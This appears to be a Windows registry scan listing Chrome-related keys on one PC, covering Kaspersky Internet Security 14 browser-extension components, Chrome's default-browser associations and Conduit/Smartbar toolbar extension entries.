"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\47748EFA7B6DD2A58A5EDD6058B5F8FA]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\48E16A3FDBE206754811EEDB84C4263B]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4B8B4246571021155B2032F6BF5F4D90]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\581E897ECB6E1EC55BDB6D48CC1B4191]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\skin\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5C3E73ED952607251A1040C6C1293961]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5EEA58F5A69858056B3EFE76AEBCC408]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6290F51512BF72A519B1A600582E763C]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\64E134423E7DB5B5F922558DB1AC2BAC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\content\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\657E5DB75DBA2695288AB45A6C343D79]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\681E8F66C20703659912FE93F0C8A693]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\75FDADDD4F19FC1599C404BAE26C29FF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7618D45441067E150B05FF1B5BDDC45E]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\79287F79522BF4C5A88D0D7EA5EC3E1C]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\79FF92DB7309A97569887B7AB024F7C3]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko20\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\82BFCA836D640955184986C0370542DD]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\abcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\883E85BD886EE8857806471B095CB7B8]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8C2B16D45B229185FAF5CA80FF685341]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E439EB5942B5D95BB46059CFB35F12D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\99C23E7B2CCCCEA5C802285262A6A938]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A4184B7DF8252A95CA0F19922FFF8199]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5116180163EA8357A2A927DB0793BD6]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A84F8442960E64A50AE400A82615FF21]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A854C73A823A8AB54AEE82FD34ED6173]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B20F76182E9C3855AA1DFFD4371FB6BF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\vkcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B6BADFE24F767A05791574919AFE46D1]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B9372B03F6651655E827482E21F329EB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BAA0CFC47908FDF5A9354B1366451030]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BB9EDEE95B068B353AD4B0324B6EAA25]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko18\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BC23558C3E8E2BC5E8C850480C058D3A]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko17\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C151A29D1CBA2D451997FF16B4A7E4E9]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C5A18BC58BCF0F5589C469C52A9BE823]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome_registrar.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C85900C7F5AD46E53B18F40833116F9E]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C91DB1BC1DCC316518C5635BDD9370EE]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CCD15FD6D85EF3E5E886C01BDACBA4CC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CEB1BC7CAF87C745DBA857BA8F2A8FCB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D0FBC4C197D095A559BD060F78FD6D7D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko15\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D4BF01793B91A6853A22A6BD8DC8186D]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\skin\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D546818284993BB5A82E68508A514EC7]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DCB5926A12248B350B5AD04F86433E6C]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE7DDF4EB338EE652B599AAD2DAE09CA]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\locales\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E4345BDA53029405F816037863A940BB]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\url_advisor_xpcom_gecko22\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5508C0CB00D4CA5BB1774C698ACC1E5]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko20\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E57B76EAE22D4265F9E02B879CF79677]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko21\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E6711D0023626335084EEF3E7B16E478]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED9B2AB1BFC423851944F5790219EAE8]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko23\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F44FF92BC273392528022F0518D5F091]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com\chrome\components\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F8079306DF7DA7856AF7D7ABA6FAB8BF]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko16\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F90BC4B2AB27D7F5CA1A9E8B64F24EB3]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\components\content_blocker_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FC0F79EBF29921A59A83339F3D7D9CD1]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\components\online_banking_xpcom_gecko24\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FE3B23949E730E556AAC9D2D9CDCEBCC]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com\chrome\content\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FF4376E4E2C926E5CA78FFAF37F19DB6]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com\chrome\locales\en\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FF785E2258A375A5BB3982D10DBBE4E8]
"3E3786F629C594045B1132A131D80D09"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com\chrome\components\virtual_keyboard_xpcom_gecko19\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa]
"path"="https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dchlnpcodkpfdpacogkljefecpegganj]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hakdifolhalapjijoafobooafbilfakh]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\hghkgaeecgjhjkannahfamoehjmkjail]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\jagncdcchgajhfhijbbhecadmaiegcmh]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pjldcfjmnllhmgjclecdnfampinooman]
"path"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\No Chrome Offer Until]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap"="-dev-multi-chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap"="2.0-dev-multi-chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\features\OnlineBankingFeature]
"Selfregs"="online_banking_firefox_registrar.dll online_banking_chrome_registrar.dll online_banking_bho.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\selfregs]
"abcrxreg.dll"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\abcrxreg.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP14.0.0\Installer\selfregs]
"online_banking_chrome_registrar.dll"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome_registrar.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Shared\HTML]
"KnownIDs"="htmlfile;ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\ChromeHTML\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome]
@="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationName"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationIcon"="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities]
"ApplicationDescription"="Google Chrome is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Google Chrome."
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xhtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".xht"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".shtml"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".html"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".htm"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\FileAssociations]
".webp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\Startmenu]
"StartMenuInternet"="Google Chrome"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"webcal"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"urn"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"tel"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"smsto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"sms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"nntp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"news"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mms"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"mailto"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"irc"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"https"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"http"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\Capabilities\URLAssociations]
"ftp"="ChromeHTML"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\DefaultIcon]
@="C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ShowIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --show-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"HideIconsCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --hide-icons"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe" --make-default-browser"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\Google Chrome\shell\open\command]
@=""C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe""
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Conduit\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Smartbar\CR\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\AppDataLow\Software\Smartbar\CR\ChromeExtData\mgekkbflbjgdcmbphhpaikbmjbifkaib\Repository]
"CT2127389.uninstallCommand"="C:\Users\Bonnie\AppData\Local\Conduit\Chrome\CT2127389\UninstallerUI.exe"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Conduit\ChromeExtData]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Conduit\ChromeExtData\mgekkbflbjgdcmbphhpaikbmjbifkaib\Repository]
"CT2127389.hostSupportChrome29Installer"="true"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\FLEXnet\Connect\db\Google Chrome.ini]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Google\Chrome]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE51F05C5F000CE9D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE51F05C5F000CE9D0]
"Name"="CHROME.EXE"
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE5224D150000CA7D0]
[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\DirectInput\CHROME.EXE5224D150000CA7D0]
